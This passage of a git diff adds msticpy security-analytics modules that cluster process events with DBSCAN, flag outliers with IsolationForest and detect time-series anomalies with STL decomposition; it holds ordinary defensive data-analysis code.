+            "CommandLine",
+            "NewProcessId",
+            "SubjectUserSid",
+            "cwd",
+            "ClusterSize",
+            "ProcessId",
+        ]
+    ]
+    procs = procs.rename(columns={"NewProcessId": "pid", "ProcessId": "ppid"})
+
+    return procs
diff --git a/msticpy/analysis/eventcluster.py b/msticpy/analysis/eventcluster.py
new file mode 100644
index 000000000..cd49976b7
--- /dev/null
+++ b/msticpy/analysis/eventcluster.py
@@ -0,0 +1,754 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""
+eventcluster module.
+
+This module is intended to be used to summarize large numbers of events
+into clusters of different patterns. High volume repeating events can
+often make it difficult to see unique and interesting items.
+
+The module contains functions to generate clusterable features from
+string data. For example, an administration command that does some
+maintenance on thousands of servers with a commandline such as:::
+
+    install-update -hostname {host.fqdn} -tmp:/tmp/{GUID}/rollback
+
+can
+be collapsed into a single cluster pattern by ignoring the character
+values in the string and using delimiters or tokens to group the values.
+
+This is an unsupervised learning module implemented using SciKit Learn
+DBScan.
+
+Contains:
+dbcluster_events: generic clustering method using DBSCAN designed to summarize
+process events and other similar data by grouping on common features.
+
+add_process_features: derives numerical features from text features such as
+commandline and process path.
+
+"""
+from binascii import crc32
+from functools import lru_cache
+from math import log10, floor
+import re
+from typing import List, Any, Tuple, Union
+
+import numpy as np
+import pandas as pd
+
+from ..common.exceptions import MsticpyImportExtraError
+from ..common.utility import export
+from .._version import VERSION
+
+try:
+    from sklearn.cluster import DBSCAN
+    from sklearn.preprocessing import Normalizer
+    import matplotlib.pyplot as plt
+    from matplotlib import cm
+except ImportError as imp_err:
+    raise MsticpyImportExtraError(
+        "Cannot use this feature without Sklearn and matplotlib installed",
+        title="Error importing Scikit Learn and matplotlib",
+        extra="ml",
+    ) from imp_err
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+# pylint: disable=too-many-arguments, too-many-locals
+@export
+def dbcluster_events(
+    data: Any,
+    cluster_columns: List[Any] = None,
+    verbose: bool = False,
+    normalize: bool = True,
+    time_column: str = "TimeCreatedUtc",
+    max_cluster_distance: float = 0.01,
+    min_cluster_samples: int = 2,
+    **kwargs,
+) -> Tuple[pd.DataFrame, DBSCAN, np.ndarray]:
+    """
+    Cluster data set according to cluster_columns features.
+
+    Parameters
+    ----------
+    data : Any
+        Input data as a pandas DataFrame or numpy array
+    cluster_columns : List[Any], optional
+        List of columns to use for features
+        - for DataFrame this is a list of column names
+        - for numpy array this is a list of column indexes
+    verbose : bool, optional
+        Print additional information about clustering results (the default is False)
+    normalize : bool, optional
+        Normalize the input data (should probably always be True)
+    time_column : str, optional
+        If there is a time column the output data will be ordered by this
+        (the default is 'TimeCreatedUtc')
+    max_cluster_distance : float, optional
+        DBSCAN eps (max cluster member distance) (the default is 0.01)
+    min_cluster_samples : int, optional
+        DBSCAN min_samples (the minimum cluster size) (the default is 2)
+
+    Other Parameters
+    ----------------
+    kwargs: Other arguments are passed to DBSCAN constructor
+
+    Returns
+    -------
+    Tuple[pd.DataFrame, DBSCAN, np.ndarray]
+        Output dataframe with clustered rows
+        DBSCAN model
+        Normalized data set
+
+    """
+    allowed_types = [np.ndarray, pd.DataFrame]
+
+    x_input = None
+    if isinstance(data, pd.DataFrame):
+        if cluster_columns is None:
+            x_input = data.values
+        else:
+            x_input = data[cluster_columns].values
+    elif isinstance(data, np.ndarray):
+        x_input = data if cluster_columns is None else data[:, cluster_columns].values
+    if x_input is None:
+        type_list = ", ".join(str(t) for t in allowed_types)
+        raise ValueError(
+            f"Input data not in expected format.\n{type(data)}",
+            f" is not one of allowed types: {type_list}",
+        )
+
+    # Create DBSCAN cluster object
+    db_cluster = DBSCAN(
+        eps=max_cluster_distance, min_samples=min_cluster_samples, **kwargs
+    )
+
+    # Normalize the data (most clustering algorithms don't do well with
+    # unnormalized data)
+    x_norm = Normalizer().fit_transform(x_input) if normalize else x_input
+    # fit the data set
+    db_cluster.fit(x_norm)
+    labels = db_cluster.labels_
+    cluster_set, counts = np.unique(labels, return_counts=True)
+    if verbose:
+        print(
+            "Clustering for set size ",
+            len(x_norm),
+            " - ",
+            len(cluster_set),
+            " clusters",
+        )
+        print("Individual cluster sizes: ", ", ".join(str(c) for c in counts))
+
+    clustered_events = _merge_clustered_items(
+        cluster_set, labels, data, time_column, counts
+    )
+
+    if verbose:
+        print("Cluster output rows: ", len(clustered_events))
+
+    return clustered_events, db_cluster, x_norm
+
+
+def _merge_clustered_items(
+    cluster_set: np.ndarray,
+    labels: np.ndarray,
+    data: Union[pd.DataFrame, np.ndarray],
+    time_column: str,
+    counts: np.ndarray,
+) -> pd.DataFrame:
+    """
+    Merge outliers and core clusters into single DataFrame.
+
+    Parameters
+    ----------
+    cluster_set : np.ndarray
+        The set of clusters
+    labels : np.ndarray
+        The cluster labels
+    data : Union[pd.DataFrame, np.ndarray]
+        The source data
+    time_column : str
+        Name of the Time column
+    counts : np.ndarray
+        The counts of members in each cluster
+
+    Returns
+    -------
+    pd.DataFrame
+        Merged dataframe
+
+    """
+    if isinstance(data, pd.DataFrame) and data.iloc[0][time_column].tz:
+        ts_type = "datetime64[ns, UTC]"
+    else:
+        ts_type = "datetime64[ns]"
+
+    cluster_list = []
+    # Iterate through clusters, adding exemplar to output frame
+    # pylint: disable=consider-using-enumerate
+    # we need to know the index of the item within the loop
+    for idx in range(len(cluster_set)):
+        cluster_id = cluster_set[idx]
+        class_members = labels == cluster_id
+        if isinstance(data, pd.DataFrame):
+            time_ordered = data[class_members].sort_values(time_column, ascending=True)
+            first_event_time = time_ordered[0:][time_column].iat[0]
+            last_event_time = time_ordered[-1:][time_column].iat[0]
+        else:
+            first_event_time = None
+            last_event_time = None
+
+        if cluster_id == -1:
+            # 'Noise' events are individual items that could not be assigned
+            # to a cluster and so are unique
+            cluster_list.append(
+                data[class_members]
+                .assign(
+                    Clustered=False,
+                    ClusterId=cluster_id,
+                    ClusterSize=1,
+                    TimeGenerated=first_event_time,
+                    FirstEventTime=first_event_time,
+                    LastEventTime=last_event_time,
+                )
+                .astype(
+                    dtype={
+                        "TimeGenerated": ts_type,
+                        "FirstEventTime": ts_type,
+                        "LastEventTime": ts_type,
+                    }
+                )
+            )
+        else:
+            # Otherwise, just choose the first example of the cluster set
+            cluster_list.append(
+                data[class_members]
+                .assign(
+                    Clustered=True,
+                    ClusterId=cluster_id,
+                    ClusterSize=counts[idx],
+                    TimeGenerated=first_event_time,
+                    FirstEventTime=first_event_time,
+                    LastEventTime=last_event_time,
+                )[0:1]
+                .astype(
+                    dtype={
+                        "TimeGenerated": ts_type,
+                        "FirstEventTime": ts_type,
+                        "LastEventTime": ts_type,
+                    }
+                )
+            )
+    # pylint: enable=consider-using-enumerate
+    return pd.concat(cluster_list)
+
+
+@export
+def add_process_features(
+    input_frame: pd.DataFrame, path_separator: str = None, force: bool = False
+) -> pd.DataFrame:
+    r"""
+    Add numerical features based on patterns of command line and process name.
+
+    Parameters
+    ----------
+    input_frame : pd.DataFrame
+        The input dataframe
+    path_separator : str, optional
+        Path separator. If not supplied, try to determine
+        from 'NewProcessName' column of first 10 rows
+        (the default is None)
+    force : bool, optional
+        Forces re-calculation of feature columns even if they
+        already exist (the default is False)
+
+    Returns
+    -------
+    pd.DataFrame
+        Copy of the dataframe with the additional numeric features
+
+    Notes
+    -----
+    Features added:
+
+    - processNameLen: length of process file name (inc path)
+    - processNameTokens: the number of elements in the path
+    - processName: the process file name (minus path)
+    - commandlineTokens: number of space-separated tokens in the command line
+    - commandlineLen: length of the command line
+    - commandlineLogLen: log10 length of commandline
+    - isSystemSession: 1 if session Id is 0x3e7 for Windows or -1 for Linux
+    - commandlineTokensFull: counts number of token separators in commandline
+      [\\s\-\\/\.,"\'\|&:;%$()]
+    - pathScore: sum of ord() value of characters in path
+    - pathLogScore: log10 of pathScore
+    - commandlineScore: sum of ord() value of characters in commandline
+    - commandlineLogScore: log10 of commandlineScore
+
+    """
+    output_df = input_frame.copy()
+
+    # Set any NaN values to empty string
+    if "NewProcessName" in output_df and "CommandLine" in output_df:
+        output_df[["NewProcessName", "CommandLine"]] = output_df[
+            ["NewProcessName", "CommandLine"]
+        ].fillna(value="")
+
+    # try to determine the path separator
+    if path_separator is None:
+        sample_df = output_df.head(10)
+        lx_path = len(sample_df[sample_df["NewProcessName"].str.contains("/")])
+        path_separator = "/" if lx_path else "\\"
+    # Create features from process name and command line
+    if "NewProcessName" in output_df:
+        _add_processname_features(output_df, force, path_separator)
+
+    if "CommandLine" in output_df:
+        _add_commandline_features(output_df, force)
+
+    if "SubjectLogonId" in output_df and ("isSystemSession" not in output_df or force):
+        output_df["isSystemSession"] = output_df["SubjectLogonId"].isin(["0x3e7", "-1"])
+
+    return output_df
+
+
+def _add_processname_features(
+    output_df: pd.DataFrame, force: bool, path_separator: str
+):
+    """
+    Add process name default features.
+
+    Parameters
+    ----------
+    output_df : pd.DataFrame
+        The dataframe to add features to
+    force : bool
+        If True overwrite existing feature columns
+    path_separator : str
+        Path separator for OS
+
+    """
+    if "processName" not in output_df or force:
+        output_df["processName"] = output_df.apply(
+            lambda x: x.NewProcessName.split(path_separator)[-1], axis=1
+        )
+    if "pathScore" not in output_df or force:
+        output_df["pathScore"] = output_df.apply(
+            lambda x: char_ord_score(x.NewProcessName), axis=1
+        )
+    if "pathLogScore" not in output_df or force:
+        output_df["pathLogScore"] = output_df.apply(
+            lambda x: log10(x.pathScore) if x.pathScore else 0, axis=1
+        )
+    if "pathHash" not in output_df or force:
+        output_df["pathHash"] = output_df.apply(
+            lambda x: crc32_hash(x.NewProcessName), axis=1
+        )
+
+
+def _add_commandline_features(output_df: pd.DataFrame, force: bool):
+    """
+    Add commandline default features.
+
+    Parameters
+    ----------
+    output_df : pd.DataFrame
+        The dataframe to add features to
+    force : bool
+        If True overwrite existing feature columns
+
+    """
+    if "commandlineLen" not in output_df or force:
+        output_df["commandlineLen"] = output_df.apply(
+            lambda x: len(x.CommandLine), axis=1
+        )
+    if "commandlineLogLen" not in output_df or force:
+        output_df["commandlineLogLen"] = output_df.apply(
+            lambda x: log10(x.commandlineLen) if x.commandlineLen else 0, axis=1
+        )
+    if "commandlineTokensFull" not in output_df or force:
+        output_df["commandlineTokensFull"] = output_df[["CommandLine"]].apply(
+            lambda x: delim_count(x.CommandLine), axis=1
+        )
+
+    if "commandlineScore" not in output_df or force:
+        output_df["commandlineScore"] = output_df.apply(
+            lambda x: char_ord_score(x.CommandLine), axis=1
+        )
+    if "commandlineTokensHash" not in output_df or force:
+        output_df["commandlineTokensHash"] = output_df.apply(
+            lambda x: delim_hash(x.CommandLine), axis=1
+        )
+
+
+@export
+@lru_cache(maxsize=1024)
+def delim_count(value: str, delim_list: str = r'[\s\-\\/\.,"\'|&:;%$()]') -> int:
+    r"""
+    Count the delimiters in input column.
+
+    Parameters
+    ----------
+    value : str
+        Data to process
+    delim_list : str, optional
+        delimiters to use. The default is::
+
+          [\s\-\\/\.,"\'|&:;%$()]
+
+    Returns
+    -------
+    int
+        Count of delimiters in the string.
+
+    """
+    return len(re.findall(delim_list, value))
+
+
+@export
+@lru_cache(maxsize=1024)
+def delim_hash(value: str, delim_list: str = r'[\s\-\\/\.,"\'|&:;%$()]') -> int:
+    r"""
+    Return a hash (CRC32) of the delimiters from input column.
+
+    Parameters
+    ----------
+    value : str
+        Data to process
+    delim_list : str, optional
+        delimiters to use. The default is::
+
+            [\s\-\\/\.,"\'|&:;%$()]
+
+    Returns
+    -------
+    int
+        Hash of delimiter set in the string.
+
+    """
+    return crc32(bytes("".join(re.findall(delim_list, value)), "utf-8"))
+
+
+@export
+@lru_cache(maxsize=1024)
+def char_ord_score(value: str, scale: int = 1) -> int:
+    """
+    Return sum of ord values of characters in string.
+
+    Parameters
+    ----------
+    value : str
+        Data to process
+    scale : int, optional
+        reduce the scale of the feature (reducing the
+        influence of variations this feature on the clustering
+        algorithm (the default is 1)
+
+    Returns
+    -------
+    int
+        [description]
+
+    Notes
+    -----
+    This function sums the ordinal value of each character in the
+    input string. Two strings with minor differences will result in
+    a similar score. However, for strings with highly variable content
+    (e.g. command lines or http requests containing GUIDs) this may result
+    in too much variance to be useful when you are trying to detect
+    similar patterns. You can use the scale parameter to reduce the
+    influence of features using this function on clustering and anomaly
+    algorithms.
+
+    """
+    return floor(sum(ord(x) for x in value) / scale)
+
+
+@export
+@lru_cache(maxsize=1024)
+def token_count(value: str, delimiter: str = " ") -> int:
+    """
+    Return count of delimiter-separated tokens pd.Series column.
+
+    Parameters
+    ----------
+    value : str
+        Data to process
+    delimiter : str, optional
+        Delimiter used to split the column string.
+        (the default is ' ')
+
+    Returns
+    -------
+    int
+        count of tokens
+
+    """
+    return len(value.split(delimiter))
+
+
+def _string_score(input_str):
+    """Sum the ord(c) for characters in a string."""
+    return sum(ord(x) for x in input_str)
+
+
+@export
+@lru_cache(maxsize=1024)
+def crc32_hash(value: str) -> int:
+    """
+    Return the CRC32 hash of the input column.
+
+    Parameters
+    ----------
+    value : str
+        Data to process
+
+    Returns
+    -------
+    int
+        CRC32 hash
+
+    """
+    return crc32(bytes(value.encode("utf-8")))
+
+
+@export
+def delim_count_df(
+    data: pd.DataFrame, column: str, delim_list: str = r'[\s\-\\/\.,"\'|&:;%$()]'
+) -> pd.Series:
+    r"""
+    Count the delimiters in input column.
+
+    Parameters
+    ----------
+    data : pd.DataFrame
+        The DataFrame to process
+    column : str
+        The name of the column to process
+    delim_list : str, optional
+        delimiters to use. The default is::
+
+            [\s\-\\/\.,"\'|&:;%$()]
+
+    Returns
+    -------
+    pd.Series
+        Count of delimiters in the string in `column`.
+
+    """
+    return data[column].str.count(delim_list)
+
+
+@export
+def char_ord_score_df(data: pd.DataFrame, column: str, scale: int = 1) -> pd.Series:
+    """
+    Return sum of ord values of characters in string.
+
+    Parameters
+    ----------
+    data : pd.DataFrame
+        The DataFrame to process
+    column : str
+        Column name to process
+    scale : int, optional
+        reduce the scale of the feature (reducing the
+        influence of variations this feature on the clustering
+        algorithm (the default is 1)
+
+    Returns
+    -------
+    pd.Series
+        The sum of the ordinal values of the characters
+        in `column`.
+
+    Notes
+    -----
+    This function sums the ordinal value of each character in the
+    input string. Two strings with minor differences will result in
+    a similar score. However, for strings with highly variable content
+    (e.g. command lines or http requests containing GUIDs) this may result
+    in too much variance to be useful when you are trying to detect
+    similar patterns. You can use the scale parameter to reduce the
+    influence of features using this function on clustering and anomaly
+    algorithms.
+
+    """
+    return data.apply(lambda x: sum(ord(char) for char in x[column]) / scale, axis=1)
+
+
+@export
+def token_count_df(data: pd.DataFrame, column: str, delimiter: str = " ") -> pd.Series:
+    """
+    Return count of delimiter-separated tokens pd.Series column.
+
+    Parameters
+    ----------
+    data : pd.DataFrame
+        The DataFrame to process
+    column : str
+        Column name to process
+    delimiter : str, optional
+        Delimiter used to split the column string.
+        (the default is ' ')
+
+    Returns
+    -------
+    pd.Series
+        count of tokens in strings in `column`
+
+    """
+    return data.apply(lambda x: len(x[column].split(delimiter)), axis=1)
+
+
+@export
+def crc32_hash_df(data: pd.DataFrame, column: str) -> pd.Series:
+    """
+    Return the CRC32 hash of the input column.
+
+    Parameters
+    ----------
+    data : pd.DataFrame
+        The DataFrame to process
+    column : str
+        Column name to process
+
+    Returns
+    -------
+    pd.Series
+        CRC32 hash of input column
+
+    """
+    return data.apply(lambda x: crc32(bytes(x[column].encode("utf-8"))), axis=1)
+
+
+# pylint: disable=too-many-arguments, too-many-statements
+@export  # noqa: C901, MC0001
+def plot_cluster(  # noqa: C901, MC0001
+    db_cluster: DBSCAN,
+    data: pd.DataFrame,
+    x_predict: np.ndarray,
+    plot_label: str = None,
+    plot_features: Tuple[int, int] = (0, 1),
+    verbose: bool = False,
+    cut_off: int = 3,
+    xlabel: str = None,
+    ylabel: str = None,
+):
+    """
+    Plot clustered data as scatter chart.
+
+    Parameters
+    ----------
+    db_cluster : DBSCAN
+        DBScan Cluster (from SkLearn DBSCAN).
+    data : pd.DataFrame
+        Dataframe containing original data.
+    x_predict : np.ndarray
+        The DBSCAN predict numpy array
+    plot_label : str, optional
+         If set the column to use to label data points
+         (the default is None)
+    plot_features :  Tuple[int, int], optional
+        Which two features in x_predict to plot (the default is (0, 1))
+    verbose : bool, optional
+        Verbose execution with some extra info
+        (the default is False)
+    cut_off : int, optional
+        The cluster size below which items are considered outliers
+        (the default is 3)
+    xlabel : str, optional
+        x-axis label (the default is None)
+    ylabel : str, optional
+        y-axis label (the default is None)
+
+    """
+    max_idx = x_predict.shape[1] - 1
+    if plot_features[0] >= x_predict.shape[1]:
+        raise ValueError(f"plot_features[0] index must be a value from 0 to {max_idx}.")
+    if plot_features[1] >= x_predict.shape[1]:
+        raise ValueError(f"plot_features[1] index must be a value from 0 to {max_idx}.")
+    if plot_features[0] == plot_features[1]:
+        mssg = "plot_features indexes must be 2 different values in range 0 to"
+        raise ValueError(mssg + f" {max_idx}.")
+
+    labels = db_cluster.labels_
+    core_samples_mask = np.zeros_like(labels, dtype=bool)
+
+    # pylint: disable=unsupported-assignment-operation
+    # (assignment of numpy array is valid)
+    core_samples_mask[db_cluster.core_sample_indices_] = True
+    unique_labels = set(labels)
+
+    # pylint: disable=no-member
+    # Spectral color map does exist
+    colors = [cm.Spectral(each) for each in np.linspace(0, 1, len(unique_labels))]
+    # Number of clusters in labels, ignoring noise if present.
+    n_clusters_ = len(set(labels)) - (1 if -1 in labels else 0)
+    n_noise_ = list(labels).count(-1)
+    _, counts = np.unique(labels, return_counts=True)
+
+    if verbose:
+        print(f"Estimated number of clusters: {n_clusters_}")
+        print(f"Estimated number of noise points: {n_noise_}")
+        # print("Silhouette Coefficient: %0.3f"
+        #       % metrics.silhouette_score(x_predict, labels))
+
+    if (
+        not isinstance(data, pd.DataFrame)
+        or plot_label is not None
+        and plot_label not in data
+    ):
+        plot_label = None
+    p_label = None
+    for cluster_id, color in zip(unique_labels, colors):
+        if cluster_id == -1:
+            # Black used for noise.
+            color = [0, 0, 0, 1]
+        class_member_mask = labels == cluster_id
+
+        cluster_size = counts[cluster_id]
+        marker_size = cluster_size
+        marker = "o"
+        font_size = "small"
+        alpha = 0.4
+
+        if cluster_size < cut_off:
+            marker = "+"
+            marker_size = 10
+            font_size = "large"
+            alpha = 1.0
+        xy_pos = x_predict[class_member_mask & core_samples_mask]
+        plt.plot(
+            xy_pos[:, plot_features[0]],
+            xy_pos[:, plot_features[1]],
+            marker,
+            markerfacecolor=tuple(color),
+            markersize=marker_size,
+        )
+
+        if plot_label:
+            first_row = data[class_member_mask].iloc[0]
+            if not first_row.empty and plot_label in first_row:
+                p_label = first_row[plot_label]
+                try:
+                    plt.annotate(
+                        p_label,
+                        xy=(xy_pos[0, plot_features[0]], xy_pos[0, plot_features[1]]),
+                        fontsize=font_size,
+                        alpha=alpha,
+                    )
+                except IndexError:
+                    pass
+
+    plt.xlabel(xlabel)
+    plt.ylabel(ylabel)
+    plt.title(f"Estimated number of clusters: {n_clusters_}")
+    plt.show()
+    return plt
diff --git a/msticpy/analysis/outliers.py b/msticpy/analysis/outliers.py
new file mode 100644
index 000000000..d0f14ae6a
--- /dev/null
+++ b/msticpy/analysis/outliers.py
@@ -0,0 +1,184 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""
+Outlier detection class. TODO **Preliminary**.
+
+Similar to the eventcluster module but a little bit more experimental
+(read 'less tested'). It uses SkLearn Isolation Forest to identify
+outlier events in a single data set or using one data set as training
+data and another on which to predict outliers.
+
+"""
+
+import math
+from typing import List, Tuple
+
+import pandas as pd
+import numpy as np
+
+from ..common.exceptions import MsticpyImportExtraError
+from .._version import VERSION
+
+try:
+    import matplotlib.pyplot as plt
+    from sklearn.ensemble import IsolationForest
+except ImportError as imp_err:
+    raise MsticpyImportExtraError(
+        "Cannot use this feature without Sklearn and matplotlib installed",
+        title="Error importing Scikit Learn and matplotlib",
+        extra="ml",
+    ) from imp_err
+
+__version__ = VERSION
+__author__ = "Ian Hellen"
+
+
+# pylint: disable=invalid-name
+def identify_outliers(
+    x: np.ndarray, x_predict: np.ndarray, contamination: float = 0.05
+) -> Tuple[IsolationForest, np.ndarray, np.ndarray]:
+    """
+    Identify outlier items using SkLearn IsolationForest.
+
+    Arguments
+    ---------
+    x : np.ndarray
+            Input data
+    x_predict : np.ndarray
+        Model
+    contamination : float
+        Percentage contamination (default: {0.05})
+
+    Returns
+    -------
+    Tuple[IsolationForest, np.ndarray, np.ndarray]
+        IsolationForest model, X_Outliers,
+        y_pred_outliers
+
+    """
+    # pylint: disable=no-member
+    rng = np.random.RandomState(42)
+
+    # fit the model
+    rows, cols = x.shape
+    max_samples = min(100, cols)
+    max_features = math.floor(math.sqrt(rows))
+    clf = IsolationForest(
+        max_samples=max_samples,
+        max_features=max_features,
+        random_state=rng,
+        contamination=contamination,
+    )
+
+    # fit and train the model
+    clf.fit(x)
+    clf.predict(x)
+
+    y_pred_outliers = clf.predict(x_predict)
+
+    x_outliers = x_predict[y_pred_outliers == -1]
+    return clf, x_outliers, y_pred_outliers
+
+
+# pylint: disable=too-many-arguments, too-many-locals
+def plot_outlier_results(
+    clf: IsolationForest,
+    x: np.ndarray,
+    x_predict: np.ndarray,
+    x_outliers: np.ndarray,
+    feature_columns: List[int],
+    plt_title: str,
+):
+    """
+    Plot Isolation Forest results.
+
+    Parameters
+    ----------
+    clf : IsolationForest
+        Isolation Forest model
+    x : np.ndarray
+        Input data
+    x_predict : np.ndarray
+        Prediction
+    x_outliers : np.ndarray
+        Set of outliers
+    feature_columns : List[int]
+        list of feature columns to display
+    plt_title : str
+        Plot title
+
+    """
+    # plot the line, the samples, and the nearest vectors to the plane
+    x_max_x = x[:, 0].max() + (x[:, 0].max() / 10)
+    x_min_x = -x[:, 0].max() / 10
+    x_max_y = x[:, 1].max() + (x[:, 1].max() / 10)
+    x_min_y = -x[:, 1].max() / 10
+    xx, yy = np.meshgrid(
+        np.linspace(x_min_x, x_max_x, 100), np.linspace(x_min_y, x_max_y, 100)
+    )
+    z = clf.decision_function(np.c_[xx.ravel(), yy.ravel()])
+    z = z.reshape(xx.shape)
+
+    plt.rcParams["figure.figsize"] = (20, 10)
+
+    plt.title(plt_title)
+    # pylint: disable=no-member
+    plt.contourf(xx, yy, z, cmap=plt.cm.Blues_r)
+
+    b1 = plt.scatter(x[:, 0], x[:, 1], c="white", s=20, edgecolor="k")
+    b2 = plt.scatter(x_predict[:, 0], x_predict[:, 1], c="green", s=40, edgecolor="k")
+    c = plt.scatter(
+        x_outliers[:, 0], x_outliers[:, 1], c="red", marker="x", s=200, edgecolor="k"
+    )
+    plt.axis("tight")
+
+    xp_max_x = x_predict[:, 0].max() + (x_predict[:, 0].max() / 10)
+    xp_min_x = -x_predict[:, 0].max() / 10
+    xp_max_y = x_predict[:, 1].max() + (x_predict[:, 1].max() / 10)
+    xp_min_y = -x_predict[:, 1].max() / 10
+
+    plt.xlim((xp_min_x, xp_max_x))
+    plt.ylim((xp_min_y, xp_max_y))
+    plt.xlabel(feature_columns[0])
+    plt.ylabel(feature_columns[1])
+
+    plt.legend(
+        [b1, b2, c],
+        [
+            "training observations",
+            "new regular observations",
+            "new abnormal observations",
+        ],
+        loc="upper right",
+    )
+    plt.show()
+
+
+def remove_common_items(data: pd.DataFrame, columns: List[str]) -> pd.DataFrame:
+    """
+    Remove rows from input DataFrame.
+
+    Parameters
+    ----------
+    data : pd.DataFrame
+        Input dataframe
+    columns : List[str]
+        Column list to filter
+
+    Returns
+    -------
+    pd.DataFrame
+        Filtered DataFrame
+
+    """
+    filtered_df = data
+    # pylint: disable=cell-var-from-loop
+    for col in columns:
+        filtered_df = filtered_df.filter(
+            lambda x: (x[col].std() == 0 and x[col].count() > 10)
+        )
+
+    return filtered_df
diff --git a/msticpy/analysis/timeseries.py b/msticpy/analysis/timeseries.py
new file mode 100644
index 000000000..309ed2619
--- /dev/null
+++ b/msticpy/analysis/timeseries.py
@@ -0,0 +1,284 @@
+# -------------------------------------------------------------------------
+# Copyright (c) Microsoft Corporation. All rights reserved.
+# Licensed under the MIT License. See License.txt in the project root for
+# license information.
+# --------------------------------------------------------------------------
+"""Module for timeseries analysis functions."""
+from datetime import datetime
+from typing import Dict, List, Optional
+
+import pandas as pd
+
+from .._version import VERSION
+from ..common.exceptions import MsticpyException, MsticpyImportExtraError
+from ..common.timespan import TimeSpan
+from ..common.utility import check_kwargs, export
+
+try:
+    from scipy import stats
+    from statsmodels.tsa.seasonal import STL
+except ImportError as imp_err:
+    raise MsticpyImportExtraError(
+        "Cannot use this feature without scipy and statsmodel installed",
+        title="Error importing package",
+        extra="ml",
+    ) from imp_err
+
+__version__ = VERSION
+__author__ = "Ashwin Patil"
+
+
+# Constants
+_DEFAULT_KWARGS = ["seasonal", "period", "score_threshold"]
+
+
+@export
+def ts_anomalies_stl(data: pd.DataFrame, **kwargs) -> pd.DataFrame:
+    """
+    Return anomalies in Timeseries using STL.
+
+    Parameters
+    ----------
+    data : pd.DataFrame
+        DataFrame as a time series data set retrived from data connector or
+        external data source. Dataframe must have 2 columns with time column
+        set as index and other numeric value.
+
+    Other Parameters
+    ----------------
+    time_column : str, optional
+        If the input data is not indexed on the time column, use this column
+        as the time index
+    data_column : str, optional
+        Use named column if the input data has more than one column.
+    seasonal : int, optional
+        Seasonality period of the input data required for STL.
+        Must be an odd integer, and should normally be >= 7 (default).
+    period: int, optional
+        Periodicity of the the input data. by default 24 (Hourly).
+    score_threshold : float, optional
+        standard deviation threshold value calculated using Z-score used to
+        flag anomalies, by default 3
+
+    Returns
+    -------
+    pd.DataFrame
+        Returns a dataframe with additional columns by decomposing time series data
+        into residual, trend, seasonal, weights, baseline, score and anomalies.
+        The anomalies column will have 0, 1,-1 values based on score_threshold set.
+
+    Notes
+    -----
+    The decomposition method is STL - Seasonal-Trend Decomposition using LOESS
+
+    """
+    check_kwargs(kwargs, _DEFAULT_KWARGS)
+    seasonal: int = kwargs.get("seasonal", 7)
+    period: int = kwargs.get("period", 24)
+    score_threshold: float = kwargs.get("score_threshold", 3.0)
+    time_column = kwargs.get("time_column")
+    data_column = kwargs.get("data_column")
+
+    if not isinstance(data, pd.DataFrame):
+        raise MsticpyException("input data should be a pandas dataframe")
+
+    if time_column:
+        data = data.set_index(time_column)
+    if data_column:
+        data = data[[data_column]]
+
+    # STL method does Season-Trend decomposition using LOESS.
+    # Accepts timeseries dataframe
+    stl = STL(data, seasonal=seasonal, period=period)
+    # Fitting the data - Estimate season, trend and residuals components.
+    res = stl.fit()
+    result = data.copy()
+    # Create dataframe columns from decomposition results
+    result["residual"] = res.resid
+    result["trend"] = res.trend
+    result["seasonal"] = res.seasonal
+    result["weights"] = res.weights
+    # Baseline is generally seasonal + trend
+    result["baseline"] = result["seasonal"] + result["trend"]
+    # Type cast and replace na values with 0
+    result = result.fillna(0).astype("int64")
+    # Calculate zscore based on residual column
+    # this column does not contain seasonal/trend components
+    result["score"] = stats.zscore(result["residual"])
+    # create spikes(1) and dips(-1) based on threshold and seasonal columns
+    result.loc[
+        (result["score"] > score_threshold) & (result["seasonal"] > 0), "anomalies"
+    ] = 1
+    result.loc[
+        (result["score"] > score_threshold) & (result["seasonal"] < 0), "anomalies"
+    ] = -1
+    result.loc[(result["score"] < score_threshold), "anomalies"] = 0
+    # Datatype casting
+    result["anomalies"] = result["anomalies"].astype("int64")
+
+    time_index_name = data.index.name or "index"
+    return result.reset_index().sort_values(time_index_name, ascending=True)
+
+
+timeseries_anomalies_stl = ts_anomalies_stl
+
+
+def extract_anomaly_periods(
+    data: pd.DataFrame,
+    time_column: str = "TimeGenerated",
+    period: str = "1H",
+    pos_only: bool = True,
+) -> Dict[datetime, datetime]:
+    """
+    Merge adjacent anomaly periods.
+
+    Parameters
+    ----------
+    data : pd.DataFrame
+        The data to process
+    time_column : str, optional
+        The name of the time column
+    period : str, optional
+        pandas-compatible time period designator,
+        by default "1H"
+    pos_only : bool, optional
+        If True only extract positive anomaly periods,
+        else extract both positive and negative.
+        By default, True
+
+    Returns
+    -------
+    Dict[datetime, datetime] :
+        start_period, end_period
+
+    """
+    # Resample data based on period - period is the granularity that
+    # we want to merge 2 adjacent samples on.
+    anom_filter = [1] if pos_only else [1, -1]
+    resampled = (
+        data[(data["anomalies"].isin(anom_filter))]
+        .sort_values(time_column)
+        .set_index(time_column)
+        .resample(period)
+    )
+
+    end_period = None
+    start_period = None
+    periods = {}
+
+    # iterate through the resampled data
+    for time, group in resampled:
+        if group.empty:
+            continue
+        if not end_period:
+            # If we're not already in an anomaly period
+            # create start/end for a new one
+            start_period = time - pd.Timedelta(period)
+            end_period = time + pd.Timedelta(period)
+            periods[start_period] = end_period
+        elif (time - end_period) <= pd.Timedelta(
+            period
+        ) * 2 and start_period is not None:
+            # if the current time is less than 2x the period away
+            # from our current end_period time, update the end_time
+            periods[start_period] = time + pd.Timedelta(period)
+        else:
+            # otherwise start a new period
+            start_period = time - pd.Timedelta(period)
+            periods[start_period] = time + pd.Timedelta(period)
+        end_period = time
+    return periods
+
+
+def find_anomaly_periods(
+    data: pd.DataFrame,
+    time_column: str = "TimeGenerated",
+    period: str = "1H",
+    pos_only: bool = True,
+) -> List[TimeSpan]:
+    """
+    Merge adjacent anomaly periods.
+
+    Parameters
+    ----------
+    data : pd.DataFrame
+        The data to process
+    time_column : str, optional
+        The name of the time column
+    period : str, optional
+        pandas-compatible time period designator,
+        by default "1H"
+    pos_only : bool, optional
+        If True only extract positive anomaly periods,
+        else extract both positive and negative.
+        By default, True
+
